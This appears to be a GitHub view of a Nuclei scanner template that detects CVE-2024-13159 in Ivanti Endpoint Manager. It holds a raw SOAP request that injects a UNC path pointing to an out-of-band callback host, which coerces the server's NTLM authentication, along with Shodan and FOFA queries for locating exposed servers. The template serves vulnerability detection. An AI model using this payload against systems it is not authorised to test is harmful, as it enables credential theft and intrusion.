-
Notifications
You must be signed in to change notification settings - Fork 3.5k
Expand file tree
/
Copy pathCVE-2024-13159.yaml
More file actions
58 lines (53 loc) · 2.56 KB
/
Copy pathCVE-2024-13159.yaml
File metadata and controls
58 lines (53 loc) · 2.56 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
id: CVE-2024-13159
info:
name: Ivanti EPM - Credential Coercion Vulnerability in GetHashForWildcardRecursive
author: ritikchaddha
severity: critical
description: |
A vulnerability in Ivanti Endpoint Manager (EPM) allows an unauthenticated attacker to coerce the EPM machine account credential via the GetHashForWildcardRecursive endpoint. The vulnerability exists due to improper input validation in the wildcard parameter, allowing an attacker to specify a remote UNC path that triggers NTLM authentication.
impact: |
Unauthenticated attackers can coerce NTLM authentication from the EPM server via UNC paths, allowing credential theft through man-in-the-middle attacks.
remediation: |
Update Ivanti Endpoint Manager (EPM) to a patched version that addresses CVE-2024-13159.
reference:
- https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13159
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-13159
cwe-id: CWE-36
epss-score: 0.94048
epss-percentile: 0.99904
metadata:
max-request: 1
shodan-query: http.favicon.hash:362091310
fofa-query: icon_hash="362091310"
tags: cve,cve2024,ivanti,epm,ntlm,traversal,kev,vkev,vuln
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: text/xml
Soapaction: http://tempuri.org/GetHashForWildcardRecursive
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetHashForWildcardRecursive xmlns="http://tempuri.org/">
<wildcard>\\{{interactsh-url}}\tmp\{{file}}.txt</wildcard>
</GetHashForWildcardRecursive>
</soap:Body>
</soap:Envelope>
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "<GetHashForWildcardRecursiveResponse")'
- 'contains(content_type, "text/xml")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022047de1f30eb39f21316583cf234b2789c06dae75e0b0dbc840fecdc15c86933f9022100a1e6fe4d4398179913e69b12a2bfb5d1f360b9e12792c3bb4c5568f019472307:922c64590222798bb761d5b6d8e72950